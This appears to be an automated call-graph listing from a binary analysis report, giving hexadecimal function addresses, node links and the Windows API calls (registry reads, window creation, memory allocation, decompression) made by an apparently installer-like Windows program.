42cb8c 6 API calls 53436->53442 53438 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53438->53442 53442->53432 53442->53436 53442->53438 53443 414af8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53442->53443 53444 46b01a 53442->53444 53445 46afd8 53442->53445 53442->53446 53509 4682f0 53442->53509 53517 469f08 53442->53517 53524 469640 53442->53524 53577 469fe8 53442->53577 53615 48146c 53442->53615 53717 46a3e4 19 API calls 53442->53717 53443->53442 53447 469fe8 23 API calls 53444->53447 53709 457114 53445->53709 53446->53414 53447->53446 53450 457114 24 API calls 53450->53444 53718 414af8 53451->53718 53453 46a69b 53455 46a6a1 53453->53455 53456 46a6d8 53453->53456 53454 46a65a 53454->53453 53459 493200 18 API calls 53454->53459 53460 46a6c3 53455->53460 53722 46c45c 53455->53722 53457 46a6e4 GetCursor LoadCursorA SetCursor Sleep SetCursor 53456->53457 53458 46a70d 53456->53458 53457->53458 53731 47d508 42 API calls 53458->53731 53459->53453 53726 414b28 53460->53726 53464 46a721 53466 46a6d6 53464->53466 53468 414b28 4 API calls 53464->53468 53469 403400 4 API calls 53466->53469 53467 403450 4 API calls 53467->53460 53468->53466 53470 46a766 53469->53470 53470->53413 53744 46b4a8 53471->53744 53474 46aa5a 53476 403420 4 API calls 53474->53476 53475 414af8 4 API calls 53477 46a926 53475->53477 53478 46aa74 53476->53478 53479 46aa46 53477->53479 53747 4554a0 13 API calls 53477->53747 53480 403400 4 API calls 53478->53480 53479->53474 53482 403450 4 API calls 53479->53482 53483 46aa7c 53480->53483 53482->53474 53484 403400 4 API calls 53483->53484 53485 46aa84 53484->53485 53485->53413 53486 46aa09 53486->53474 53486->53479 53491 42cd14 7 API calls 53486->53491 53488 46a9a9 53488->53474 53488->53486 53757 42cd14 53488->53757 53490 46a944 53490->53488 53748 465d14 53490->53748 53493 46aa1f 53491->53493 53493->53479 53498 450ab8 4 API calls 53493->53498 53497 465d14 19 API calls 53500 46a984 53497->53500 53501 46aa36 53498->53501 53752 450a88 53500->53752 53764 47d508 42 API calls 53501->53764 53507 4682f0 19 API calls 53506->53507 53508 4683c3 53507->53508 53508->53429 53510 46831f 53509->53510 53511 4078fc 19 API calls 53510->53511 53514 468360 53510->53514 53512 468358 53511->53512 53983 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53512->53983 53515 403400 4 API calls 53514->53515 53516 468378 53515->53516 53516->53442 53518 469f14 53517->53518 53519 469f19 53517->53519 53520 469f17 53518->53520 53984 469974 53518->53984 54069 4691c0 46 API calls 53519->54069 53520->53442 53522 469f21 53522->53442 53525 403400 4 API calls 53524->53525 53526 46966d 53525->53526 54419 47c564 53526->54419 53528 469692 53529 469696 53528->53529 53530 4696ac 53528->53530 54437 465f14 53529->54437 53532 4696a0 53530->53532 54440 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53530->54440 53535 469771 53532->53535 53536 4697dc 53532->53536 53576 4698a5 53532->53576 53534 403420 4 API calls 53538 4698e1 53534->53538 53539 403494 4 API calls 53535->53539 53540 403494 4 API calls 53536->53540 53537 4696c8 53537->53532 53541 4696d0 53537->53541 53538->53442 53542 46977e 53539->53542 53543 4697e9 53540->53543 53544 469fe8 23 API calls 53541->53544 53545 40357c 4 API calls 53542->53545 53546 40357c 4 API calls 53543->53546 53547 4696dd 53544->53547 53548 46978b 53545->53548 53549 4697f6 53546->53549 54441 42f3d4 53547->54441 53551 40357c 4 API calls 53548->53551 53552 40357c 4 API calls 53549->53552 53554 469798 53551->53554 53555 469803 53552->53555 53558 40357c 4 API calls 53554->53558 53559 40357c 4 API calls 53555->53559 53557 469724 53557->53442 53560 4697a5 53558->53560 53561 469810 53559->53561 53562 465f14 20 API calls 53560->53562 53563 40357c 4 API calls 53561->53563 53565 4697b3 53562->53565 53564 46981e 53563->53564 53567 414b28 4 API calls 53564->53567 53566 40357c 4 API calls 53565->53566 53568 4697bc 53566->53568 53569 4697da 53567->53569 53570 40357c 4 API calls 53568->53570 54458 46624c 53569->54458 53572 4697c9 53570->53572 53573 414b28 4 API calls 53572->53573 53573->53569 53576->53534 53578 4682f0 19 API calls 53577->53578 53580 46a000 53578->53580 53579 46a034 54620 4649f4 53579->54620 53580->53579 53581 4649f4 7 API calls 53580->53581 53581->53579 53585 46a04c 53587 46a09a 53585->53587 53588 46a133 53585->53588 54641 469f9c 19 API calls 53585->54641 53589 4682f0 19 API calls 53587->53589 53590 46a1f2 GetSystemMenu EnableMenuItem 53588->53590 53589->53588 53591 414b28 4 API calls 53590->53591 53592 46a212 53591->53592 53593 46a21e 53592->53593 53594 46a248 53592->53594 53595 414b28 4 API calls 53593->53595 53596 46a264 53594->53596 53597 46a28e 53594->53597 53598 46a232 53595->53598 53599 414b28 4 API calls 53596->53599 53600 414b28 4 API calls 53597->53600 53601 414b28 4 API calls 53598->53601 53602 46a278 53599->53602 53603 46a2a2 53600->53603 53604 46a246 53601->53604 53605 414b28 4 API calls 53602->53605 53606 414b28 4 API calls 53603->53606 54637 469f30 53604->54637 53605->53604 53606->53604 53609 4683b4 19 API calls 53613 46a340 53609->53613 53611 46a2e0 53611->53609 53612 46a3a3 53612->53442 53613->53612 54643 49314c 18 API calls 53613->54643 53616 46b4a8 47 API calls 53615->53616 53617 4814af 53616->53617 53618 4814b8 53617->53618 54843 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53617->54843 53620 414af8 4 API calls 53618->53620 53621 4814c8 53620->53621 53622 403450 4 API calls 53621->53622 53623 4814d5 53622->53623 54663 46b7b8 53623->54663 53626 4814e5 53628 414af8 4 API calls 53626->53628 53629 4814f5 53628->53629 53630 403450 4 API calls 53629->53630 53631 481502 53630->53631 53632 468fa8 SendMessageA 53631->53632 53633 48151b 53632->53633 53634 481559 53633->53634 54845 478a14 23 API calls 53633->54845 53636 4241ec 11 API calls 53634->53636 53637 481563 53636->53637 53638 481589 53637->53638 53639 481574 SetActiveWindow 53637->53639 54692 480a68 53638->54692 53639->53638 53686->53413 53687->53413 53688->53413 56563 43d21c 53689->56563 53692 49322c 56568 431424 53692->56568 53693 4932b2 53694 4932c1 53693->53694 56601 492a28 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53693->56601 53694->53442 53703 493276 56599 492abc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53703->56599 53705 49328a 56600 433624 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53705->56600 53707 4932aa 53707->53442 53708->53435 53710 457139 53709->53710 53711 457159 53710->53711 53712 4078fc 19 API calls 53710->53712 53714 403400 4 API calls 53711->53714 53713 457151 53712->53713 53715 456f08 24 API calls 53713->53715 53716 45716e 53714->53716 53715->53711 53716->53450 53717->53442 53719 414b06 53718->53719 53720 4034e0 4 API calls 53719->53720 53721 414b13 53720->53721 53721->53454 53723 46a6b6 53722->53723 53724 46c465 53722->53724 53723->53467 53732 46c53c 53724->53732 53727 414af8 4 API calls 53726->53727 53728 414b4c 53727->53728 53729 403400 4 API calls 53728->53729 53730 414b7d 53729->53730 53730->53466 53731->53464 53733 46c543 53732->53733 53736 45cf00 53733->53736 53737 45cf0b 53736->53737 53738 45cf26 VirtualAlloc 53737->53738 53739 45cf45 53738->53739 53740 45cf4a BZ2_bzDecompressInit 53738->53740 53739->53740 53743 45ce5c 19 API calls 53740->53743 53742 45cf8f 53742->53723 53743->53742 53765 46b534 53744->53765 53747->53490 53750 465d2e 53748->53750 53934 4078fc 53750->53934 53753 450aa8 53752->53753 53953 450960 53753->53953 53977 42cc98 53757->53977 53760 450ab8 53761 450a88 4 API calls 53760->53761 53762 450ad4 53761->53762 53763 47d508 42 API calls 53762->53763 53763->53486 53764->53479 53766 414af8 4 API calls 53765->53766 53767 46b566 53766->53767 53819 465fac 53767->53819 53770 414b28 4 API calls 53771 46b578 53770->53771 53772 46b587 53771->53772 53775 46b5a0 53771->53775 53868 47d508 42 API calls 53772->53868 53774 46b59b 53776 403420 4 API calls 53774->53776 53777 46b5e7 53775->53777 53779 46b5ce 53775->53779 53778 46a90a 53776->53778 53780 46b64c 53777->53780 53793 46b5eb 53777->53793 53778->53474 53778->53475 53869 47d508 42 API calls 53779->53869 53871 42cb18 CharNextA 53780->53871 53783 46b65b 53784 46b65f 53783->53784 53787 46b678 53783->53787 53872 47d508 42 API calls 53784->53872 53786 46b633 53870 47d508 42 API calls 53786->53870 53788 46b69c 53787->53788 53828 46611c 53787->53828 53873 47d508 42 API calls 53788->53873 53793->53786 53793->53787 53796 46b6b5 53797 403778 4 API calls 53796->53797 53798 46b6cb 53797->53798 53836 42c968 53798->53836 53801 46b6dc 53874 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53801->53874 53802 46b70a 53804 42c898 5 API calls 53802->53804 53806 46b715 53804->53806 53805 46b6ef 53807 450ab8 4 API calls 53805->53807 53840 42c40c 53806->53840 53809 46b6fc 53807->53809 53875 47d508 42 API calls 53809->53875 53810 46b720 53850 42cb8c 53810->53850 53824 465fc6 53819->53824 53821 42cb8c 6 API calls 53821->53824 53822 403450 4 API calls 53822->53824 53823 406bb8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53823->53824 53824->53821 53824->53822 53824->53823 53825 46600f 53824->53825 53877 42ca78 53824->53877 53826 403420 4 API calls 53825->53826 53827 466029 53826->53827 53827->53770 53829 466126 53828->53829 53831 466139 53829->53831 53907 42cb08 CharNextA 53829->53907 53831->53788 53832 46614c 53831->53832 53833 466156 53832->53833 53834 466183 53833->53834 53908 42cb08 CharNextA 53833->53908 53834->53788 53834->53796 53837 42c9c1 53836->53837 53838 42c97e 53836->53838 53837->53801 53837->53802 53838->53837 53909 42cb08 CharNextA 53838->53909 53841 42c416 53840->53841 53842 42c439 53840->53842 53910 42c948 CharPrevA 53841->53910 53844 403494 4 API calls 53842->53844 53845 42c442 53844->53845 53845->53810 53846 42c41d 53846->53842 53847 42c428 53846->53847 53911 4035c0 53847->53911 53849 42c436 53849->53810 53851 42c648 IsDBCSLeadByte 53850->53851 53854 42cb9d 53851->53854 53852 42cbc4 53854->53852 53933 42cb10 CharPrevA 53854->53933 53868->53774 53869->53774 53870->53774 53871->53783 53872->53774 53873->53774 53874->53805 53875->53774 53878 403494 4 API calls 53877->53878 53879 42ca88 53878->53879 53883 42cabe 53879->53883 53886 403744 53879->53886 53890 42c454 IsDBCSLeadByte 53879->53890 53882 42cb02 53882->53824 53883->53882 53891 4037b8 53883->53891 53896 42c454 IsDBCSLeadByte 53883->53896 53887 40374a 53886->53887 53889 40375b 53886->53889 53888 4034bc 4 API calls 53887->53888 53887->53889 53888->53889 53889->53879 53890->53879 53892 403744 4 API calls 53891->53892 53894 4037c6 53892->53894 53893 4037fc 53893->53883 53894->53893 53897 4038a4 53894->53897 53896->53883 53898 4038b1 53897->53898 53905 4038e1 53897->53905 53900 4038da 53898->53900 53902 4038bd 53898->53902 53899 403400 4 API calls 53901 4038cb 53899->53901 53903 4034bc 4 API calls 53900->53903 53901->53893 53906 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53902->53906 53903->53905 53905->53899 53906->53901 53907->53829 53908->53833 53909->53838 53910->53846 53912 4035c4 53911->53912 53918 40357c 53911->53918 53913 403450 53912->53913 53915 4035e2 53912->53915 53916 4035d4 53912->53916 53912->53918 53920 4034bc 4 API calls 53913->53920 53922 403464 53913->53922 53917 4034bc 4 API calls 53915->53917 53921 403450 4 API calls 53916->53921 53918->53913 53919 4035bf 53918->53919 53923 40358a 53918->53923 53919->53849 53920->53922 53921->53918 53925 4035b4 53923->53925 53926 40359d 53923->53926 53933->53854 53937 407910 53934->53937 53938 40792d 53937->53938 53945 4075c0 53938->53945 53941 407959 53943 4034e0 4 API calls 53941->53943 53944 40790b 53943->53944 53944->53497 53948 4075db 53945->53948 53946 4075ed 53946->53941 53950 4069a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53946->53950 53948->53946 53951 4076e2 19 API calls 53948->53951 53952 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53948->53952 53950->53941 53951->53948 53952->53948 53954 403400 4 API calls 53953->53954 53962 450991 53954->53962 53957 4509a8 53958 4034e0 4 API calls 53958->53962 53960 40357c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53960->53962 53961 4509bc 53962->53957 53962->53958 53962->53960 53962->53961 53978 42cb8c 6 API calls 53977->53978 53979 42ccba 53978->53979 53980 42ccc2 GetFileAttributesA 53979->53980 53981 403400 4 API calls 53980->53981 53982 42ccdf 53981->53982 53982->53486 53982->53760 53983->53514 53986 4699bb 53984->53986 53985 469e33 53987 469e4e 53985->53987 53988 469e7f 53985->53988 53986->53985 53989 469a76 53986->53989 53992 403494 4 API calls 53986->53992 53991 403494 4 API calls 53987->53991 53993 403494 4 API calls 53988->53993 53990 469a97 53989->53990 53994 469ad8 53989->53994 53995 403494 4 API calls 53990->53995 53996 469e5c 53991->53996 53997 4699fa 53992->53997 53998 469e8d 53993->53998 54002 403400 4 API calls 53994->54002 53999 469aa5 53995->53999 54090 46889c 12 API calls 53996->54090 54001 414af8 4 API calls 53997->54001 54091 46889c 12 API calls 53998->54091 54004 414af8 4 API calls 53999->54004 54006 469a1b 54001->54006 54007 469ad6 54002->54007 54009 469ac6 54004->54009 54005 469e6a 54008 403400 4 API calls 54005->54008 54010 403634 4 API calls 54006->54010 54027 469bbc 54007->54027 54070 468fa8 54007->54070 54012 469eb0 54008->54012 54014 403634 4 API calls 54009->54014 54015 469a2b 54010->54015 54018 403400 4 API calls 54012->54018 54013 469c44 54016 403400 4 API calls 54013->54016 54014->54007 54019 414af8 4 API calls 54015->54019 54020 469c42 54016->54020 54017 469af8 54021 469b36 54017->54021 54022 469afe 54017->54022 54023 469eb8 54018->54023 54024 469a3f 54019->54024 54085 4693e4 43 API calls 54020->54085 54028 403400 4 API calls 54021->54028 54025 403494 4 API calls 54022->54025 54026 403420 4 API calls 54023->54026 54024->53989 54033 414af8 4 API calls 54024->54033 54029 469b0c 54025->54029 54030 469ec5 54026->54030 54027->54013 54031 469c03 54027->54031 54032 469b34 54028->54032 54076 47ad88 54029->54076 54030->53520 54037 403494 4 API calls 54031->54037 54079 46929c 54032->54079 54034 469a66 54033->54034 54038 403634 4 API calls 54034->54038 54041 469c11 54037->54041 54038->53989 54039 469c6d 54047 469cce 54039->54047 54048 469c78 54039->54048 54040 469b24 54042 403634 4 API calls 54040->54042 54043 414af8 4 API calls 54041->54043 54042->54032 54045 469c32 54043->54045 54049 403634 4 API calls 54045->54049 54046 469b5d 54052 469bbe 54046->54052 54053 469b68 54046->54053 54050 403400 4 API calls 54047->54050 54051 403494 4 API calls 54048->54051 54049->54020 54054 469cd6 54050->54054 54059 469c86 54051->54059 54056 403400 4 API calls 54052->54056 54055 403494 4 API calls 54053->54055 54057 469ccc 54054->54057 54068 469d7f 54054->54068 54061 469b76 54055->54061 54056->54027 54057->54054 54086 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54057->54086 54059->54054 54059->54057 54062 403634 4 API calls 54059->54062 54060 469cf9 54060->54068 54087 49339c 18 API calls 54060->54087 54061->54027 54064 403634 4 API calls 54061->54064 54062->54059 54064->54061 54066 469e20 54089 429154 SendMessageA SendMessageA 54066->54089 54088 429104 SendMessageA 54068->54088 54069->53522 54092 42a050 SendMessageA 54070->54092 54072 468fb7 54073 468fd7 54072->54073 54093 42a050 SendMessageA 54072->54093 54073->54017 54075 468fc7 54075->54017 54094 47ada8 54076->54094 54080 4692c9 54079->54080 54081 46932b 54080->54081 54418 469220 43 API calls 54080->54418 54082 403400 4 API calls 54081->54082 54083 469340 54082->54083 54083->54046 54085->54039 54086->54060 54087->54068 54088->54066 54089->53985 54090->54005 54091->54005 54092->54072 54093->54075 54095 403494 4 API calls 54094->54095 54103 47addb 54095->54103 54096 47aee0 54097 403420 4 API calls 54096->54097 54098 47ada3 54097->54098 54098->54040 54099 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54099->54103 54101 403778 4 API calls 54101->54103 54103->54096 54103->54099 54103->54101 54106 479cfc 54103->54106 54338 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54103->54338 54339 403800 54103->54339 54343 42c948 CharPrevA 54103->54343 54107 479d4e 54106->54107 54108 479d2c 54106->54108 54109 479d6e 54107->54109 54110 479d5c 54107->54110 54108->54107 54348 478c2c 19 API calls 54108->54348 54113 479dd1 54109->54113 54114 479d7c 54109->54114 54111 403494 4 API calls 54110->54111 54235 479d69 54111->54235 54121 479df2 54113->54121 54122 479ddf 54113->54122 54115 479d85 54114->54115 54116 479dab 54114->54116 54118 479d98 54115->54118 54349 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54115->54349 54119 479dbe 54116->54119 54350 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54116->54350 54117 403400 4 API calls 54120 47a67c 54117->54120 54124 403494 4 API calls 54118->54124 54126 403494 4 API calls 54119->54126 54127 403400 4 API calls 54120->54127 54130 479e13 54121->54130 54131 479e00 54121->54131 54128 403494 4 API calls 54122->54128 54124->54235 54126->54235 54129 47a684 54127->54129 54128->54235 54129->54103 54133 479e63 54130->54133 54134 479e21 54130->54134 54132 403494 4 API calls 54131->54132 54132->54235 54141 479e84 54133->54141 54142 479e71 54133->54142 54135 479e3d 54134->54135 54136 479e2a 54134->54136 54137 479e50 54135->54137 54351 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54135->54351 54138 403494 4 API calls 54136->54138 54140 403494 4 API calls 54137->54140 54138->54235 54140->54235 54144 479ea5 54141->54144 54145 479e92 54141->54145 54143 403494 4 API calls 54142->54143 54143->54235 54147 479ec6 54144->54147 54148 479eb3 54144->54148 54146 403494 4 API calls 54145->54146 54146->54235 54150 479ee7 54147->54150 54151 479ed4 54147->54151 54149 403494 4 API calls 54148->54149 54149->54235 54153 479ef5 54150->54153 54154 479f24 54150->54154 54152 403494 4 API calls 54151->54152 54152->54235 54155 479f11 54153->54155 54156 479efe 54153->54156 54159 479f32 54154->54159 54160 479f61 54154->54160 54158 403494 4 API calls 54155->54158 54157 403494 4 API calls 54156->54157 54157->54235 54158->54235 54161 479f4e 54159->54161 54162 479f3b 54159->54162 54165 479f82 54160->54165 54166 479f6f 54160->54166 54163 403494 4 API calls 54161->54163 54163->54235 54235->54117 54338->54103 54340 403804 54339->54340 54342 40382f 54339->54342 54341 4038a4 4 API calls 54340->54341 54341->54342 54342->54103 54343->54103 54348->54108 54349->54118 54350->54119 54351->54137 54418->54080 54420 47c592 54419->54420 54424 47c5c8 54419->54424 54462 455228 54420->54462 54421 403420 4 API calls 54422 47c6dc 54421->54422 54422->53528 54424->54421 54425 47c6a5 54425->53528 54428 47c5bc 54428->54424 54428->54425 54430 47ad88 43 API calls 54428->54430 54433 47c651 54428->54433 54469 478218 54428->54469 54480 47830c 54428->54480 54484 47c12c 31 API calls 54428->54484 54429 47ad88 43 API calls 54429->54433 54430->54428 54431 42c8f8 5 API calls 54431->54433 54433->54428 54433->54429 54433->54431 54434 42c920 5 API calls 54433->54434 54436 47c692 54433->54436 54485 47c274 58 API calls 54433->54485 54434->54433 54436->54424 54547 465e28 54437->54547 54440->53537 54442 42f3e0 54441->54442 54443 42f403 GetActiveWindow GetFocus 54442->54443 54444 41eeb4 2 API calls 54443->54444 54445 42f41a 54444->54445 54446 42f437 54445->54446 54447 42f427 RegisterClassA 54445->54447 54448 42f4c6 SetFocus 54446->54448 54449 42f445 CreateWindowExA 54446->54449 54447->54446 54451 403400 4 API calls 54448->54451 54449->54448 54450 42f478 54449->54450 54578 42428c 54450->54578 54453 42f4e2 54451->54453 54457 49339c 18 API calls 54453->54457 54454 42f4a0 54455 42f4a8 CreateWindowExA 54454->54455 54455->54448 54456 42f4be ShowWindow 54455->54456 54456->54448 54457->53557 54584 44ad68 54458->54584 54463 455239 54462->54463 54464 455246 54463->54464 54465 45523d 54463->54465 54494 45500c 29 API calls 54464->54494 54486 454f2c 54465->54486 54468 455243 54468->54428 54470 47822e 54469->54470 54471 47822a 54469->54471 54472 403450 4 API calls 54470->54472 54471->54428 54473 47823b 54472->54473 54474 478241 54473->54474 54475 47825b 54473->54475 54523 4780d8 54474->54523 54477 4780d8 19 API calls 54475->54477 54478 478257 54477->54478 54479 403400 4 API calls 54478->54479 54479->54471 54481 478318 54480->54481 54482 478333 54481->54482 54546 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54481->54546 54482->54428 54484->54428 54485->54433 54495 42dd44 54486->54495 54488 454f49 54489 454f97 54488->54489 54498 454e60 54488->54498 54489->54468 54492 454e60 6 API calls 54493 454f78 RegCloseKey 54492->54493 54493->54468 54494->54468 54496 42dd55 RegOpenKeyExA 54495->54496 54497 42dd4f 54495->54497 54496->54488 54497->54496 54503 42dc80 54498->54503 54500 403420 4 API calls 54501 454f12 54500->54501 54501->54492 54502 454e88 54502->54500 54506 42db28 54503->54506 54507 42db4e RegQueryValueExA 54506->54507 54508 42db93 54507->54508 54514 42db71 54507->54514 54509 403400 4 API calls 54508->54509 54511 42dc5f 54509->54511 54510 42db8b 54512 403400 4 API calls 54510->54512 54511->54502 54512->54508 54513 4034e0 4 API calls 54513->54514 54514->54508 54514->54510 54514->54513 54515 403744 4 API calls 54514->54515 54516 42dbc8 RegQueryValueExA 54515->54516 54516->54507 54517 42dbe4 54516->54517 54517->54508 54518 4038a4 4 API calls 54517->54518 54519 42dc26 54518->54519 54520 42dc38 54519->54520 54522 403744 4 API calls 54519->54522 54521 403450 4 API calls 54520->54521 54521->54508 54522->54520 54524 4780f3 54523->54524 54527 4781b2 54524->54527 54528 478124 54524->54528 54541 477f8c 19 API calls 54524->54541 54526 478149 54531 47816a 54526->54531 54543 477f8c 19 API calls 54526->54543 54527->54478 54528->54526 54542 477f8c 19 API calls 54528->54542 54531->54527 54532 4781aa 54531->54532 54544 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54531->54544 54535 477e10 54532->54535 54536 477e4b 54535->54536 54537 403450 4 API calls 54536->54537 54538 477e70 54537->54538 54545 476500 19 API calls 54538->54545 54540 477eb1 54540->54527 54541->54528 54542->54526 54543->54531 54544->54532 54545->54540 54546->54482 54548 403494 4 API calls 54547->54548 54549 465e56 54548->54549 54564 42daf0 54549->54564 54552 42daf0 5 API calls 54553 465e7a 54552->54553 54554 465d14 19 API calls 54553->54554 54555 465e84 54554->54555 54556 42daf0 5 API calls 54555->54556 54557 465e93 54556->54557 54567 465d8c 54557->54567 54560 42daf0 5 API calls 54561 465eac 54560->54561 54562 403400 4 API calls 54561->54562 54563 465ec1 54562->54563 54563->53532 54571 42da38 54564->54571 54568 465dac 54567->54568 54569 4078fc 19 API calls 54568->54569 54570 465df6 54569->54570 54570->54560 54572 42dae3 54571->54572 54575 42da58 54571->54575 54572->54552 54573 4037b8 4 API calls 54573->54575 54575->54572 54575->54573 54576 403800 4 API calls 54575->54576 54577 42c454 IsDBCSLeadByte 54575->54577 54576->54575 54577->54575 54579 4242be 54578->54579 54580 42429e GetWindowTextA 54578->54580 54582 403494 4 API calls 54579->54582 54581 4034e0 4 API calls 54580->54581 54583 4242bc 54581->54583 54582->54583 54583->54454 54587 44abe0 54584->54587 54588 44ac13 54587->54588 54589 414af8 4 API calls 54588->54589 54592 44ac26 54589->54592 54590 44ac53 73A0A570 54598 41a1f8 54590->54598 54591 40357c 4 API calls 54591->54590 54592->54590 54592->54591 54595 44ac84 54599 41a223 54598->54599 54600 41a2bf 54598->54600 54617 403520 54599->54617 54601 403400 4 API calls 54600->54601 54602 41a2d7 SelectObject 54601->54602 54602->54595 54618 4034e0 4 API calls 54617->54618 54623 4649ff 54620->54623 54621 464ada 54631 4667a4 54621->54631 54622 464a92 54622->54621 54650 4185c8 7 API calls 54622->54650 54623->54621 54626 464a4f 54623->54626 54644 421a2c 54623->54644 54626->54622 54627 464a94 54626->54627 54628 464a89 54626->54628 54630 421a2c 7 API calls 54627->54630 54629 421a2c 7 API calls 54628->54629 54629->54622 54630->54622 54632 4667d4 54631->54632 54633 4667b5 54631->54633 54632->53585 54634 414b28 4 API calls 54633->54634 54635 4667c3 54634->54635 54636 414b28 4 API calls 54635->54636 54636->54632 54638 469f3d 54637->54638 54639 421a2c 7 API calls 54638->54639 54640 469f96 54639->54640 54640->53611 54642 466274 18 API calls 54640->54642 54641->53587 54642->53611 54643->53612 54645 421a84 54644->54645 54647 421a3a 54644->54647 54645->54626 54646 421a69 54646->54645 54659 421d38 SetFocus GetFocus 54646->54659 54647->54646 54651 408cc4 54647->54651 54650->54621 54652 408cd0 54651->54652 54660 406df4 LoadStringA 54652->54660 54655 403450 4 API calls 54656 408d01 54655->54656 54657 403400 4 API calls 54656->54657 54658 408d16 54657->54658 54658->54646 54659->54645 54661 4034e0 4 API calls 54660->54661 54662 406e21 54661->54662 54662->54655 54664 46b7e1 54663->54664 54665 414af8 4 API calls 54664->54665 54666 46b82e 54664->54666 54667 46b7f7 54665->54667 54668 403420 4 API calls 54666->54668 54851 466038 6 API calls 54667->54851 54670 46b8d8 54668->54670 54670->53626 54844 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54670->54844 54671 46b7ff 54672 414b28 4 API calls 54671->54672 54673 46b80d 54672->54673 54674 46b81a 54673->54674 54676 46b833 54673->54676 54852 47d508 42 API calls 54674->54852 54677 46b84b 54676->54677 54678 46611c CharNextA 54676->54678 54853 47d508 42 API calls 54677->54853 54680 46b847 54678->54680 54680->54677 54681 46b861 54680->54681 54682 46b867 54681->54682 54683 46b87d 54681->54683 54854 47d508 42 API calls 54682->54854 54685 42c968 CharNextA 54683->54685 54686 46b88a 54685->54686 54686->54666 54855 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54686->54855 54688 46b8a1 54689 450ab8 4 API calls 54688->54689 54690 46b8ae 54689->54690 54856 47d508 42 API calls 54690->54856 54693 480ab9 54692->54693 54694 480a8b 54692->54694 54696 4749c8 54693->54696 54857 49314c 18 API calls 54694->54857 54858 456f08 54696->54858 54699 4072b0 SetCurrentDirectoryA 54700 474a1e 54699->54700 54845->53634 54851->54671 54852->54666 54853->54666 54854->54666 54855->54688 54856->54666 54857->54693 54859 456f34 54858->54859 54874 45703c 54858->54874 55399 456c04 GetSystemTimeAsFileTime FileTimeToSystemTime 54859->55399 54860 45708d 54863 403400 4 API calls 54860->54863 54865 4570a2 54863->54865 54864 456f3c 54866 4078fc 19 API calls 54864->54866 54865->54699 54867 456fad 54866->54867 55400 456ef8 20 API calls 54867->55400 54874->54860 55403 456774 6 API calls 54874->55403 55399->54864 55403->54860 56602 431740 56563->56602 56565 403400 4 API calls 56566 43d2ca 56565->56566 56566->53692 56566->53693 56567 43d246 56567->56565 56569 43142a 56568->56569 56570 402648 4 API calls 56569->56570 56571 43145a 56570->56571 56572 492c58 56571->56572 56573 492d2d 56572->56573 56574 492c72 56572->56574 56579 492d70 56573->56579 56574->56573 56576 4335c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56574->56576 56578 403450 4 API calls 56574->56578 56607 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56574->56607 56608 4314f4 56574->56608 56576->56574 56578->56574 56580 492d8c 56579->56580 56616 4335c0 56580->56616 56582 492d91 56583 4314f4 4 API calls 56582->56583 56584 492d9c 56583->56584 56585 43cde8 56584->56585 56586 43ce15 56585->56586 56591 43ce07 56585->56591 56586->53703 56587 43ce91 56595 43cf4b 56587->56595 56619 4468d8 56587->56619 56589 43cedc 56625 43d5a4 56589->56625 56591->56586 56591->56587 56592 4468d8 4 API calls 56591->56592 56592->56591 56593 43d151 56593->56586 56645 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56593->56645 56595->56593 56596 43d132 56595->56596 56643 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56595->56643 56644 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56596->56644 56599->53705 56600->53707 56601->53694 56603 403494 4 API calls 56602->56603 56605 43174f 56603->56605 56604 431779 56604->56567 56605->56604 56606 403744 4 API calls 56605->56606 56606->56605 56607->56574 56609 431502 56608->56609 56610 431514 56608->56610 56614 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56609->56614 56612 431536 56610->56612 56615 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56610->56615 56612->56574 56614->56610 56615->56612 56617 402648 4 API calls 56616->56617 56618 4335cf 56617->56618 56618->56582 56620 4468f7 56619->56620 56621 4468fe 56619->56621 56646 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56620->56646 56622 4314f4 4 API calls 56621->56622 56624 44690e 56622->56624 56624->56589 56626 43d5c0 56625->56626 56639 43d5ed 56625->56639 56627 402660 4 API calls 56626->56627 56626->56639 56627->56626 56628 43d622 56628->56595 56630 43f6f9 56630->56628 56631 43c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56631->56639 56633 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56633->56639 56637 43356c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56637->56639 56638 43336c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56638->56639 56639->56628 56639->56630 56639->56631 56639->56633 56639->56637 56639->56638 56640 435ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56639->56640 56641 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56639->56641 56642 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56639->56642 56647 438f34 56639->56647 56653 4366a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56639->56653 56654 